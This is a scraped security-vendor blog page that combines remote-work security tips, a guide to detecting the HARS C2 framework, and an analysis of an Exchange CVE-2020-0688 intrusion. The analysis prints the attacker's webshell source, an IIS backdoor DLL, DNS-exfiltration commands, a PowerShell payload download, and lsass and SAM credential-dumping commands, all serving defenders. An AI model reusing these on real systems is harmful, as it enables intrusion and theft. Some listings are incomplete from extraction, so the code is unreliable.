Skip navigation
All Places > Products > RSA NetWitness Platform > Blog

1       Introduction

The efforts of people around the globe have suddenly forced many workers to stay at home. For a significant portion of these workers that also means working remotely either for the first time, or at least more often than their normal telecommuting schedule. As a result of this necessity, many organizations may be forced to implement new remote technologies or significantly expand their current capacities for remote users. This added capability can present a significant security risk if not implemented correctly. Furthermore, malicious actors never pass up the opportunity to capitalize on current affairs. The RSA Incident Response Team has years of experience responding to Targeted Attacks and Advanced Threat Actors while assisting our clients with improving their overall security posture. The members of our team are either working with our customers on-site or supporting them from home. Our team has frequently assisted clients remotely, providing us with extensive experience in operating a secure remote team. Given the increasing threat landscape,  we are sharing some essential tips and suggestions on how organizations can improve their security posture, as well as how their remote workforce can keep themselves secure by following some best practices.

2       Tips for Organizations (A Starting Point)

While there are many steps organizations can take to better protect themselves and their users, the RSA IR team is sharing some essential tips and suggestions that we consider to be a good starting point. However, these are by no means a complete list.  Each organization should adjust the below recommendations according to the organization’s security posture, and risk profile and acceptance.

Many vendors are offering emergency capacity extensions or trials of their products in this time of unprecedented social change.  Check with your vendors to see if they have any such offers in place for technology that your organization does not already have implemented as it pertains to the recommendations listed below. For a strategic approach, take a look at the post from our colleagues on the Advanced Cyber Defense (ACD) team Work From Home - The Paradigm Shift in Cyber Defense.

2.1      What Organizations Can Do for Their Users

2.1.1    VPN

While it may be tempting and seem like an easy option to just make resources available online via services like RDP, this is generally not recommended. Threat actors love searching for vulnerable servers that are connected to the internet regardless of the port used. Search engines like Shodan are showing an increase in the number of servers exposing RDP directly to the internet ( ). Open RDP servers are regularly used to infect organizations with Ransomware and other malware (Two weeks after Microsoft warned of Windows RDP worms, a million internet-facing boxes still vulnerable • The Register ). RSA strongly discourages organizations from exposing RDP services directly to the internet.

Organizations should utilize VPN (or VPN alternative) technologies for employee remote access. RSA IR has the following tips regarding VPN usage.

  • Ensure Licensing counts can support the increased number of remote workers.
  • Ensure that the VPN devices can handle the increased number of simultaneous connections and throughput.
  • For strong security, RSA recommends that the VPN be Always-On if possible. An Always-On VPN requires the system to be connected to the VPN whenever an authorized client is connected to the internet. If bandwidth, simultaneous connection count, or bring-your-own-device (BYOD) is of concern, this suggestion can be re-prioritized.
  • All traffic should be tunneled over the VPN (No Split Tunneling), thus enabling the same network visibility and controls as if users were in office. If bandwidth availability or bring-your-own-device (BYOD) is of concern to the organization, this recommendation can be re-prioritized.
  • Investigate VPN alternatives for certain users. Alternative remote access solutions also exist such as, Virtual Desktops Infrastructure (VDI), Cloud Infrastructure, Software as a Service (SaaS), and others.

2.1.2    Multi Factor Authentication (Also Known as Two Factor Authentication) For All Remote Access

All remote access (including VPN, VDI, Cloud, Office365, SaaS, etc.) should be required to utilize Multi Factor Authentication. Multi Factor Authentication, which is an evolution of Two Factor Authentication (2FA), enhances security by requiring that a user present multiple pieces of information for authentication. Credentials typically fall into one of three categories: something you know (like a password or PIN), something you have (like a smart card or token), or something you are (like your fingerprint). Credentials must come from two different categories in order to be classified as multi-factor. As mentioned, check with your vendors to see if they are offering any assistance with surge capacity or new solutions.

2.1.3    User Education

RSA generally recommends that all staff using computer resources within a company complete annual security training. However, during this time when more users are working remotely, RSA recommends that organizations hold a special organization-wide user education session on password safety, phishing attacks, IT security policies, as well as covering how to report issues to the IT and Security Teams. If you’re looking for a place to start, see our other blog post for tips for users that are working from home (RSA IR - Recommendations for Users Working from Home).

2.2      What Organizations Can Do for Themselves

2.2.1    Updates and Patching

RSA consistently finds out-of-date and out-of-support Operating Systems and software running in client environments. Older software often has public vulnerabilities and exploits that are freely available online and are often targeted by commodity malware as well as targeted attackers. RSA strongly recommends that any core software be aggressively updated on a regular basis, especially if a vulnerability for a particular application is publicly announced. Exploiting vulnerable software is one of the easiest ways for an attacker to find their way into the enterprise. At a minimum organizations should look to:

  • Update and Patch all external facing systems, servers and applications (including web applications or frameworks).
  • Update and Patch all Critical Systems internal or external.

2.2.2    Web Application Firewall

If not already deployed, RSA recommends implementing a Web Application Firewall (WAF) to better protect Internet facing web applications. A WAF solution can provide a reduction in the attack surface of web applications and in some cases, of the operating system itself. It is important to note that simply installing a WAF solution will not immediately secure all the web applications as all WAF solutions, regardless of vendor, need to be tuned for the specific applications and environments they are being used to protect.

If a WAF is already deployed, RSA recommends that organizations verify that it is in front of not just the business-critical web applications, but also all other external web-facing assets.

2.2.3    Leverage Freely Available Threat Intelligence Feeds

As notices have been released about increased attacker activity related to recent attacks and fraud (, many threat intelligence vendors are offering freely available intelligence of current threats and scams. Here are some of the companies offering related intelligence feeds for free, as well as providing some additional tools for analysts.

2.2.4    Endpoint Detection and Response (EDR)

Endpoint Detection and Response (EDR) is especially important to organizations that, for various reasons, are unable to enable an Always-On VPN. 

If your organization already has an Endpoint Detection and Response (EDR) solution, ensure that it is deployed to all remote users.  Since endpoints may not be sending all their traffic internally to allow for network visibility, EDR tools can help gain visibility of endpoints operating outside the internal network environment. Organizations need to ensure that data collected by the EDR tool can be transmitted to the central EDR server either continuously or while connected to the VPN. Organizations must also ensure that their licensing limits, as well as server capacity, support a potential increase in the number of endpoints.  Speak to your security vendors to see if they provide surge or Business Continuity increases during this time.

If your organization does not currently have an EDR tool, then consider deploying one.  EDR solutions now offer more than just detection and blacklisting of malware; but also, have built-in forensic capabilities such as acquiring remote system files, memory images, behavior analysis, and false positive management via whitelisting. This means that organizations can detect, respond and block malicious activity much quicker and without the need to create a full host forensic image for investigation. Additionally, once a Behavior of Compromise (BOC) is identified, the EDR solution should be able to detect where else in the enterprise that indicator has been observed. Speak to your trusted security vendors and see if they are offering any on a trial basis.

2.2.5    Remote Collaboration

If your organization does not already have a policy for remote collaboration tools (such as screen share), consider adopting one for remote users. At the very least, RSA suggests having a recommendation for users so that they do not seek out their own solutions.  Some examples include Zoom, WebEx, GoToMeeting, Microsoft Teams, as well as others.

3      Conclusion

In these uncertain times, we hope that this advice will help organizations and users stay connected and stay secure. Watch out for more posts and advice from across the RSA organization, and let us know what you're doing in the comments below.

I have recently been posting a number of blogs regarding the usage of the RSA NeWitness Platform to detect attackers within your environment. As the list of the blogs grow, it is becoming increasingly difficult to navigate through them easily. In order to combat this, this blog post will contain references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.









Special thanks to Rui Ataide for his support and guidance for these posts.

I recently reviewed HTTP Asynchronous Reverse Shell (HARS) for The C2 Matrix, which should be posted soon! They also have a Google Docs spreadsheet here: C2Matrix - Google Sheets. I’ve been following them for awhile and have tried to map as may of the frameworks as possible from a defensive perspective. This blog post will therefore cover just that, how to use RSA NetWitness to detect HARS.


The Attack

After editing the configuration files, we can compile the executable to run on the victim endpoint. After executing the binary we get the default error message, which is configurable, but we left it with default settings:


The error message is a ruse and the connection is still made back to the C2 server where we see the successful connection from our victim endpoint:


It drops us by default into a prompt where we can begin to execute our commands, such as whoamiquser, etc:


Detection Using NetWitness Network

By default HARS uses SSL, so to see the underlying HTTP traffic, we used a MITM proxy to intercept the communication; it is highly advisable to introduce SSL interception into your own envrionment. Within this post, we will also cover the anomalies with the communication over SSL.



An interesting meta value generated for the HARS traffic is, http invalid cookie - this meta value looks for HTTP cookies that do not follow RFC 6265:


Drilling into the Events view for these sessions before reconstructing them, we can observe that there is a beacon type pattern to the connections with some jitter, and also a low variance in the payload for each request - this indicates that this is a more mechanical type check-in behaviour:


Reconstructing the events and looking at the cookie for the requests, we can see what looks like Base64 data:



Using the built-in Base64 decoding, we can see that this decodes to HELLO. While this is not indicative of malicious activity, this is still a malformed cookie and a rather strange value:


From here, we can continue to go through the traffic and decode the values supplied within the cookie header. The next few cookies contain the text QVNL, which returns ASK when Base64 decoded:


Eventually we come across a cookie with a Base64 encoded version of what looks like the ouput from a whoami command:


As well as one that contains the output from a quser command. Both these look rather suspicious and this is information that normally shouldn't be sent to a remote host, especially in this manner as a cookie value:


Looking through the request prior to the one that returns the output of quser, and sifting though the payload, there is a Base64 encoded quser command within it:


This C2 framework disguises its commands within legitimate looking pages in an attempt to evade detection by analysts, but is easily detected with NetWitness using a single meta value, http invalid cookie.

NOTE: It is important to remember that many applications abuse the HTTP protocol and do not follow RFC's, it is therefore possible for legitimate traffic to have inavlid cookies, it is down to the defender to determine whether the activity is malicious or not, but NetWitness points you to these anomalies and makes it easier to focus on traffic of interest.


This C2 is highly malleable and therefore the following application rule would only pick up on its default configuration, however, attackers tend to be lazy and leave many of the default settings for these tools. This would allow us to easily create an application rule to detect this behaviour:

cookie = 'QVNL','SEVMTE8='


In order for the application rule to work, you would need to register the cookie HTTP header. This involves using the customHeaders() function within the HTTP_lua_options file as described on the community:


One of our previous posts also covered registering the cookie HTTP header into a meta key and can be found on the community:




As previously stated, HARS uses SSL to communicate by default. When HARS initially connects back to the C2 from the victim endpoint, it attempts to blend in with typical traffic to www[.]bing[.]com. The below screenshot shows the malicious traffic (on the left), and the legitimate traffic to Bing (on the right). Playing spot the difference, we can see a few anomalies as highlighted below:


This allows us to create logic to detect possible HARS usage with the following application rule:

service = 443 &&'' &&'microsoft corporation' && ssl.subject='microsoft corporation'


And we can also create an application rule to look for anomalous Bing certificates, this would, however, be lower fidelity in order to detect a broader range of suspicious cases to aid in threat hunting:

service = 443 && = '' && not('' &&'microsoft corporation','baltimore' && ssl.subject='')


Detection Using NetWitness Endpoint

HARS uses PowerShell to execute the commands on the victim endpoint, but does not use any form of obfuscation. Therefore in NetWitness Endpoint, we can see multiple hits under the Behaviours of Compromise meta key for the reconaissance commands executed, quser, whoami, and tasklist:


Drilling into those meta values, we can see an executable named, hars.exe, running out of a suspect directory and executing reconaissance type commands:


Pivoting on the filename, hars.exe, (filename.src = 'hars.exe'), which really could be any other name, but would still be launching your commands, we can see all the events from this suspect executable, such as the commands it executed under the Source Parameter meta key:


After every command executed, HARS adds the following, echo flag_end. We can use this to our advantage to create an application rule to detect its behaviour:

category = 'console event' && param.src ends 'echo flag_end'


Another neat indicator comes under the Context meta key, here we can see four interesting meta values associated with, hars.exe - console.remote, network.ipv4, network.nonroutable, and network.outgoing - these meta values tell us that this executable is making an outbound network connection and running console commands:


Drilling into the Events view for the network meta values, we can see where the executable is connecting to:


And drilling into the console.remote meta value, we can see the commands that were executed:


So from a defenders perspective, it could be a good idea to use the filter, context = 'console.remote' - and look for suspicious executables:



Not all C2 frameworks use advanced methods of obfuscation or encryption, some rely on confusing analysts by trying to blend in with normal traffic by mimicking legitimate web sites. It is important as a defender to spot these anomalies and fully analyse the traffic, even if it at first glance appears to be normal, and remember, the attacker would probably think none of this really matters as the attack is over SSL and this data would not be visible to analysts, which is where having SSL interception is a great advantage for analysts, it really catches attackers out.


By now, you may have already started to work from home instead of your usual workplace, like many of your co-workers and peers. As the situation continues to evolve, there is a rapidly increasing trend for organisations to shift their employees from office to work from home. In addition to the recommendations provided in the following RSA blogs: Cyber Resiliency Begins at Home, RSA IR - Best Practices for Organizations (A Starting Point), and RSA IR - Recommendations for Users Working from Home, in this post, we will be going into further details to examine the potential challenges that cybersecurity professionals are contending with as organizations around the globe start to transit more employees from offices to work-from-home arrangements and conducting meetings through virtual means; this transformation in how we work and conduct our businesses will inevitably have an impact on our threat environment. We will discuss in the subsequent paragraphs on what is the paradigm shift in our threat landscape and what should we do to continue to stay effective in safeguarding our assets from the emerging cyber threats.



There are 2 key problems that we see here which we will break it down in the following paragraphs:


Problem #1

The cyber defense architecture for many of the organizations today are designed based on the assumption that most of the daily BAU activities are performed on-premise. With the sudden need to allow a good number of employees to work-from-home, it means that many of the activities would now have to be performed remotely. The challenges in provisioning or scaling of the necessary IT infrastructure to support these sudden changes aside, this also gives rise to a shift in the threat landscape, where the existing cyber defense measures that have been working in the past, may no longer be effective now.


Problem #2

There is an increasing trend that attackers are preying on the psychology of human beings by coming up with new attacks related to the latest trending news topic or specifically targeting work-from-home employees through the remote meeting applications that they use, for example:

  • Phishing Emails and Malware Attachments disguised as legitimate meeting invites and installers from popular remote meeting applications.
  • Malicious mobile applications promising to be the most up-to-date outlet for tracking the latest breaking news and developments.
  • Domain names that are similar to popular remote meeting platforms.


Combining both the above-mentioned problems and coupled with the tendency that as humans we naturally feel more comfortable in our home setting as compared to offices, there is an increased likelihood where some of us may be letting our guards down when it comes to spotting Phishing Emails, Malicious attachments and applications, as well as malicious websites that come knocking on our door at the least expected timing. All these can lead to an exponential increase in the level of cybersecurity risks faced by your organization and when there is a sudden surge in the number of cybersecurity breaches, does your organization have the capacity to handle them?   



Here, we look at what you can possibly explore as part of the Cybersecurity Team in your organization from the perspectives of People, Process and Technology to address the above mentioned issues.



Virtual Cyber Awareness Briefings. With increasingly more employees working from home, you can no longer conduct the usual quarterly cyber awareness briefings in traditional classroom settings. Instead of halting these briefings, why not take them virtual in the form of webinars for all employees who are working remotely. There are many platforms which can allow you to do so, such as WebEx, Zoom, Adobe Connect etc. You can also record the sessions and make them available offline for employees who are not able to join the live sessions.


EDMs. Apart from virtual awareness briefings, you should also look to increase the frequency of Electronic Direct Mails (EDMs) to remind the employees on the necessary cyber hygiene that they should continue to practice even when working from home.


Reward-based Quizzes. Besides briefings and EDMs, you can also take one step further to implement regular reward-based quizzes related to different cyber hygiene topics, in order to encourage and engage your employees in an interactive manner.  


Phishing Tests. Lastly, to assess if the above initiatives are effective, the best way is to test it out by implementing a Phishing Campaign on your internal employees. This could include regular phishing tests to your employees to assess their alertness in spotting such threats. You should also look to send out such emails in batches and in a random manner across different departments and regions such that the employees are not able to “cheat” the test by sharing information with their peers on such ongoing tests.

For the above initiatives, you could potentially include phishing topics that are related to the latest trending news or emails disguised as coming from legitimate remote meeting applications (e.g. meeting invites) in order to mimic the latest threats that the organization is facing.



There are a couple of key processes which would require review and revision, to ensure that they are relevant to the work-from-home model. For example: 


Access Control. With the increasing number of employees working from home, you need to review the existing access control related processes, such as the requirements for an employee to qualify for remote access. For example, your Access Control List (ACL) for remote access could be previously role-based, but this may no longer applies if you are in the situation where practically most of the employees across different roles may require remote access. With this sudden growth of remote access employees, are the existing access control provisioning and review processes still practical and relevant? Of course, there are many other issues to consider in this area, which will be too long to be discussed in this post.    


Incident Reporting. With the work-from-home model, you need to ensure that all employees working remotely are familiar with the incident reporting mechanisms in the event of any suspicious happenings. For example, they need to know what is the reporting hotline and email address which they can reach out to on a 24/7 basis, as well as other automated reporting mechanisms such as having a tool to report on phishing emails in their outlook application.


Cybersecurity Champions. Apart from the regular Incident Reporting mechanisms, you should also consider appointing representatives across different departments or teams as “Cybersecurity Champions”, who are basically regular employees (i.e. not part of the Cybersecurity Team) but are more proficient in the area of the relevant security processes in the organization. This initiative will allow employees to reach out to someone whom they are familiar with if they are unsure of any suspicious happenings or if they would like to have a quick refresher on what are the best practices in cyber hygiene.  


Incident Response (IR). Are your existing IR processes robust enough and tailored to include the remote working model practiced by most of your employees right now? You should look to review your existing processes covering the following phases and ensure that they remain relevant to the latest Business and Operating models of your organization:

  • Triage
  • Investigation
  • Containment
  • Eradication
  • Remediation
  • After Action Review



Access Control. In terms of access control provisioning for remote working, you should consider what is the best approach to implement multi-factor authentication in a manner where you can scale up/ down the infrastructure quickly in a cost-effective manner. The options could include the following, depending on your existing set-up, requirements and budget:

  • Hardware token
  • Software token
  • SMS/ Email OTP


For operations on critical servers that need to be performed remotely, there may be a need to differentiate them from the regular 2FA that is provisioned for normal remote access, by having a further step-up in the authentication process.


Monitoring and Detection. With the shift to the remote working model, there is a need to put more focus on the SIEM Use Cases related to VPN and remote access so that you can pick up such threats early. These are some examples of the Use Cases that may be relevant to the remote working model:

  • Detecting VPN access from suspicious locations
  • Simultaneous VPN Geo login from a single user
  • Suspicious remote logon hours from critical admin accounts
  • Remote admin session reconnected from a different workstation
  • Mass phishing attempts targeting your organization
  • and many more..


Endpoint. There are many different layers of endpoint controls which become especially important for the work-from-home model, such as the following:

  • Hard Disk Encryption for all PCs, so that the corporate data remains protected even if they are misplaced
  • Mobile Device Management which allows IT Department to manage the corporate information stored in mobile devices and allow the corporate information to be securely removed remotely if they are misplaced.
  • Endpoint Detection and Response to detect advanced threats in your endpoint devices, which may not have been picked up by traditional Anti-Malware solutions.
  • Data Labelling Enforcement and Data Loss Prevention (DLP) – Enforce data labeling for all documents and emails created or modified, and implement DLP to detect or prevent unauthorized movement of sensitive data.
  • Application Whitelisting as a second layer of defense against unauthorized installation of malicious applications masqueraded as genuine ones into the corporate PC.  


Network and Servers. To ensure that you are not opening up the attack surface of your network and assets given the increased number of remote connections, you should consider the following:

  • VPN provisioning for all remote connections.
  • Network Access Control to disallow remote connections from PCs to the corporate network if the Anti-Virus definitions or patching status of the PCs are not up-to-date.
  • Jump Server. Consider placing a Jump Server in front of critical servers to serve as an added layer of defense. This is especially important if the servers are critical but need to be accessed remotely.


Email. For corporate emailing, you could look to implement a Phishing Email Reporting Tool which your employees could easily report a phishing email to the Cybersecurity Team without having to manually write an email or call the reporting hotline. Also, you should look to implement a Labelling mechanism to automatically label all emails received from external Domains as “External”, as this has been proven to be effective in raising the alertness of employees when they receive any external emails, which could potentially be a phishing email or contain malicious artefacts.


Threat Intel and Hunting. A common saying goes “Know thyself and thy adversary to win a hundred battles”, this is very true and applies in the realm of Cyber Defense as well. By having timely intel that are relevant to your threat landscape, it helps you perform sense making and correlation of threats in your environment more effectively and allows you to put in the necessary measures early to look out for such threats. You should also look to conduct regular pro-active threat hunting sessions by trained specialists (i.e. Threat Hunters) to discover low-lying and advanced attacks which could otherwise may not have been picked up by your regular controls.



Given the need to transition quickly,  securely and efficiently to a remote working model for your organization, you will need to be able to make the relevant changes to your existing Cyber Defense Architecture (in the areas of People, Process and Technology) within a short amount of time, in order to ensure that the level of cybersecurity risk which your organization could be potentially exposed to, continues to remain within an acceptable level. As such, it may be worthwhile to consider engaging external professionals for tasks which could be performed remotely, for example:

  • Perform a gap analysis on your existing processes (e.g. Incident Response and Reporting Processes, Access Provisioning Processes) through documents review and remote workshops that are focused on the remote working model and provide practical recommendations on what you can quickly implement to close the gaps.
  • Develop Use Cases that are tailored to the remote working model to ensure that the detection remains effective against the latest threat landscape.
  • Subscribe to a temporary Managed Security Service to outsource your Level 1 monitoring to an external party if you anticipate a surge in the number of alerts in the SOC during a particular period, so that you can free up the time of your internal SOC team to focus on investigation and incident response.
  • Subscribe to an IR Retainer service to implement a surge resourcing model, ensuring that you have sufficiently trained expert resources when needed most, to assist the internal IR Team in times of complex incidents which may require highly complex work such as malware analysis and digital forensics.
  • Conduct threat hunting sessions to discover any low-lying threats which may have been present for some time in your environment.



To conclude, there is no one-size-fit-all solution but we hope that the above will provide you with some useful insights in planning for your Cyber Defense Architecture. 



In this blog I describe a recent intrusion that started with the exploit of CVE-2020-0688. Microsoft released a patch for this vulnerability on 11 February 2020. In order for this exploit to work, an authenticated account is needed to be able to make requests against the Exchange Control Panel (ECP). Some organizations may still have not patched for this vulnerability for various reasons, such as prolonged change request procedures. One false sense of "comfort" for delaying this patch for some organizations could be the fact that an authenticated account is needed to execute the exploit. However, harvesting a set of credentials from an organization is typically fairly easy, either via a credential harvesting email, or via a simple dictionary attack against the exchange server. Details on the technical aspects of this exploit have been widely described on various sites. So, in this blog I will briefly describe the exploit artifacts, and then jump into the actual activity that followed the exploit, including an interesting webshell that utilizes pipes for command execution. I will then describe how to decrypt the communication over this webshell. Finally, I will highlight some of the detection mechanisms that are native to the Netwitness Platform that will alert your organization to such activity.


Exchange Exploit - CVE-2020-0688


The first sign of the exploit started on 26 February 2020. The attacker leveraged the credentials of an account it had already compromised to authenticate to OWA. An attacker could acquire such accounts either by guessing passwords due to poor password policy, or by preceding the exploit with a credential harvesting attack. Once the at least one set of credentials has been acquired, the attacker can start to issue commands via the exploit against ECP. The IIS logs contain these commands, and they can be easily decoded via a two-step process: URL Decode -> Base64 Decode.


IIS log entry of exploit code


The following Cyberchef recipe helps us decode the highlighted exploit code:'A-Za-z0-9%2B/%3D',true)


The highlighted encoded data above decodes to the following where we see the attacker attempt to echo the string 'flogon' into a file named flogon2.js in one of the public facing Exchange folders:


Decoded exploit command


The attacker performed two more exploit success checks by launching an ftp command to anonymously login to IP address, followed by a ping request to a Burp Collaborator domain:


Exploit-success checks


The attacker returned on 29 February 2020 to attempt to establish persistence on the Exchange servers (multiple servers were load balanced). The exploit commands once again started with pings to Burp Collaborator domains and FTP connection attempts to IP address to ensure that the server was still exploitable. These were followed up by commands to write simple strings into files in the Exchange directories, as shown below:


Exploit success checks


The attacker also attempted to create a local user account named “public” with password “Asp-=14789’’ via the exploit, and attempted to add this account to the local administrators group. These two actions failed.


Attacker commands
cmd /c net user public Asp-=14789 /add
cmd /c net localgroup administrators public /add


The attacker issued several ping requests to subdomains under, which is a site that can be freely used to test data exfiltration over DNS. In these commands, the DNS resolution itself is what enables the sending of data to the attacker. Again, the attacker appears to have been trying to see if the exploit commands were successful, and these DNS requests would have confirmed the success of the exploit commands.


Here is what the attacker would have seen if the requests were successful:


DNSBin RSA test


Here are some of the generic domain names the attacker tried: pings
ping –n 1
ping –n 1
ping –n 1


After confirming that the DNS requests were being made, the attacker then started concatenating the output of Powershell commands to these DNS requests in order to see the result of the commands. It is worth mentioning here that at this point the attacker was still executing commands via the exploit, and while the commands did execute, the attacker did not have a way to see the results of such attempts. Hence, initially the attacker wrote some output to files as shown above (such as flogon2.txt), or in this case sending the output of the commands via DNS lookups. So, for example, the attacker tried commands such as:


Concatenating Powershell command results to DNS queries


powershell Resolve-DnsName((test-netconnection -port 443 -informationlevel quiet).toString()+'')

powershell Resolve-DnsName((test-path 'c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth').toString()+$env:computername+'')


These types of request would have confirmed that the server is allowed to connect outbound to the Internet (by being able to reach, test the existence of the specified path, and sent the hostname to the attacker. 


Exploit command output exfiled via DNS




Once the attacker confirmed that the server(s) could reach the Internet and verified the Exchange path, he/she issued a command via the exploit to download a webshell hosted at pastebin into this directory under a file named OutlookDN.aspx (I am redacting the full pastebin link to prevent the hijacking of such webshells on other potential victims by other actors, since the webshell is password protected):


Webshell Upload via Exploit
powershell (New-Object System.Net.WebClient).DownloadFile('**REDACTED**','C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookDN.aspx')


The webshell code downloaded from pastebin is shown below:


Content of OutlookDN.aspx webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="whoami" />
<asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
<script runat="server">
protected void exec(object sender, EventArgs e)
Process p = new Process();
p.StartInfo.FileName = "cmd";
p.StartInfo.Arguments = "/c " + cmd.Text;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
Response.Write("<pre>\r\n"+p.StandardOutput.ReadToEnd() +"\r\n</pre>");
protected void Page_Load(object sender, EventArgs e)
if (Request.Params["pw"]!="*******REDACTED********") Response.End();


At this point the exploit was no longer necessary since this webshell was now directly accessible and the results of the commands were displayed back to the attacker. The attacker proceeded to execute commands via this webshell and upload other webshells from this point forward. One of the other uploaded webshells is shown below:


Webshell 2
powershell [System.IO.File]::WriteAllText('c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\a.aspx',[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5dGVzKFJlcXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5Db29raWVzWyJjIl0uVmFsdWUpKTslPgo=')))

The webshell code decoded from above is:


<%@ Page Language="C#"%><%System.IO.File.WriteAllBytes(Request["p"],Convert.FromBase64String(Request.Cookies["c"].Value));%>


At this point the attacker performed some of the most common activities that attackers perform during the early stages of the compromise. Namely, credential harvesting,  user and group lookups, some pings and directory traversals.


The credential harvesting consisted of several common techniques:


Credential harvesting related activity

Used SysInternal’s ProcDump (pr.exe) to dump the lsass.exe process memory:

cmd.exe /c pr.exe -accepteula -ma lsass.exe lsasp

Used the comsvcs.dll technique to dump the lsass.exe process memory:

cmd /c tasklist | findstr lsass.exe
cmd.exe /c rundll32.exe c:\windows\system32\comsvcs.dll, Minidump 944 c:\windows\temp\temp.dmp full

Obtained copies of the SAM and SYSTEM hives for the purpose of harvesting local account password hashes. 

These files were then placed on public facing exchange folders and downloaded directly from the Internet:

cmd /c copy c:\windows\system32\inetsrv\system
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\system.js"

cmd /c copy c:\windows\system32\inetsrv\sam
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\sam.js"


In addition to the traditional ASPX type webshells, the attacker introduced another type of webshell into the Exchange servers. Two files were uploaded under the c:\windows\temp\ folder to setup this new backdoor:




File System.Web.TransportClient.dll is webshell, whereas file tmp.ps1 is a script to register this DLL with IIS. The content of this script are shown below:


[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")            
$publish = New-Object System.EnterpriseServices.Internal.Publish
$name = (gi C:\Windows\Temp\System.Web.TransportClient.dll).FullName
$type = "System.Web.TransportClient.TransportHandlerModule, " + [System.Reflection.AssemblyName]::GetAssemblyName($name).FullName
c:\windows\system32\inetsrv\Appcmd.exe add module /name:TransportModule /type:"$type"


The decompiled code of the DLL is shown below (I am only showing part of the AES encryption key, to once again prevent the hijacking of such a webshell):


using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Security.Cryptography;
using System.Text;
namespace System.Web.TransportClient
public class TransportHandlerModule : IHttpModule
public void Init(HttpApplication application)
application.BeginRequest += new EventHandler(this.Application_EndRequest);
private void Application_EndRequest(object source, EventArgs e)
HttpContext context = ((HttpApplication) source).Context;
HttpRequest request = context.Request;
HttpResponse response = context.Response;
string keyString = "kByTsFZq********nTzuZDVs********";
string cipherData1 = request.Params[keyString.Substring(0, 8)];
string cipherData2 = request.Params[keyString.Substring(16, 8)];
if (cipherData1 != null)
response.ContentType = "text/plain";
string plain;
string command = TransportHandlerModule.Decrypt(cipherData1, keyString);
plain = cipherData2 != null ? TransportHandlerModule.Client(command, TransportHandlerModule.Decrypt(cipherData2, keyString)) :;
catch (Exception ex)
plain = "error:" + ex.Message + " " + ex.StackTrace;
response.Write(TransportHandlerModule.Encrypt(plain, keyString));
private static string Encrypt(string plain, string keyString)
byte[] bytes1 = Encoding.UTF8.GetBytes(keyString);
byte[] salt = new byte[10]
(byte) 1,
(byte) 2,
(byte) 23,
(byte) 234,
(byte) 37,
(byte) 48,
(byte) 134,
(byte) 63,
(byte) 248,
(byte) 4
byte[] bytes2 = new Rfc2898DeriveBytes(keyString, salt).GetBytes(16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes1;
rijndaelManaged1.IV = bytes2;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
using (MemoryStream memoryStream = new MemoryStream())
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateEncryptor(bytes1, bytes2), CryptoStreamMode.Write))
byte[] bytes3 = Encoding.UTF8.GetBytes(plain);
memoryStream.Write(bytes2, 0, bytes2.Length);
cryptoStream.Write(bytes3, 0, bytes3.Length);
return Convert.ToBase64String(memoryStream.ToArray());
private static string Decrypt(string cipherData, string keyString)
byte[] bytes = Encoding.UTF8.GetBytes(keyString);
byte[] buffer = Convert.FromBase64String(cipherData);
byte[] rgbIV = new byte[16];
Array.Copy((Array) buffer, 0, (Array) rgbIV, 0, 16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes;
rijndaelManaged1.IV = rgbIV;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
using (MemoryStream memoryStream = new MemoryStream(buffer, 16, buffer.Length - 16))
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Read))
return new StreamReader((Stream) cryptoStream).ReadToEnd();
private static string run(string command)
string str = "/c " + command;
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = str;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
return process.StandardOutput.ReadToEnd();
private static string Client(string command, string path)
string pipeName = "splsvc";
string serverName = ".";
Console.WriteLine("sending to : " + serverName + ", path = " + path);
using (NamedPipeClientStream pipeClientStream = new NamedPipeClientStream(serverName, pipeName))
StreamWriter streamWriter = new StreamWriter((Stream) pipeClientStream);
return new StreamReader((Stream) pipeClientStream).ReadToEnd();
public void Dispose()


The registered DLL shows up in the IIS Modules as TransportModule:


IIS Module Installation


This DLL webshell is capable of executing commands directly via cmd.exe, or send the command to a pipe named splsvc. In this setup, the DLL acts as the pipe client, i.e. it sends data to the named pipe. In order to setup the other side of the pipe (i.e. the server side of the pipe), the attacker executed this command:


cmd.exe /c WMIC /node:"." process call create "powershell -enc


The encoded data in the Powershell command decodes to this script, which sets up the pipe server:


$script = {
     $pipeName = 'splsvc'
     $cmd = Get-WmiObject Win32_Process -Filter "handle = $pid" | Select-Object -ExpandProperty commandline
